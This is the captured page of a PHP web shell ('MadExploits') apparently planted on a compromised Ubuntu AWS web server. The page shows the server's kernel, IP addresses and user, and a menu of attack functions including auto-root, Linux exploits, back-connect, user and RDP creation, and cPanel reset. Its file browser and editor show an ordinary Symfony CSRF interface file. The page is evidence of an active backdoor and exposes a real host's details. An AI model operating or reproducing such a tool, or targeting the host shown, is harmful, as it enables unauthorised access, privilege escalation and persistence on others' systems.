Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.134.105.118
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz /
vendor /
symfony /
security-csrf /
[ HOME SHELL ]
Name
Size
Permission
Action
Exception
[ DIR ]
drwxrwxr-x
TokenGenerator
[ DIR ]
drwxrwxr-x
TokenStorage
[ DIR ]
drwxrwxr-x
CsrfToken.php
1.05
KB
-rw-rw-r--
CsrfTokenManager.php
4.14
KB
-rw-rw-r--
CsrfTokenManagerInterface.php
1.83
KB
-rw-rw-r--
LICENSE
1.04
KB
-rw-rw-r--
README.md
572
B
-rw-rw-r--
composer.json
983
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CsrfTokenManagerInterface.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Security\Csrf; /** * Manages CSRF tokens. * * @author Bernhard Schussek <bschussek@gmail.com> */ interface CsrfTokenManagerInterface { /** * Returns a CSRF token for the given ID. * * If previously no token existed for the given ID, a new token is * generated. Otherwise the existing token is returned (with the same value, * not the same instance). * * @param string $tokenId The token ID. You may choose an arbitrary value * for the ID * * @return CsrfToken The CSRF token */ public function getToken(string $tokenId); /** * Generates a new token value for the given ID. * * This method will generate a new token for the given token ID, independent * of whether a token value previously existed or not. It can be used to * enforce once-only tokens in environments with high security needs. * * @param string $tokenId The token ID. You may choose an arbitrary value * for the ID * * @return CsrfToken The CSRF token */ public function refreshToken(string $tokenId); /** * Invalidates the CSRF token with the given ID, if one exists. * * @return string|null Returns the removed token value if one existed, NULL * otherwise */ public function removeToken(string $tokenId); /** * Returns whether the given CSRF token is valid. * * @return bool Returns true if the token is valid, false otherwise */ public function isTokenValid(CsrfToken $token); }
Close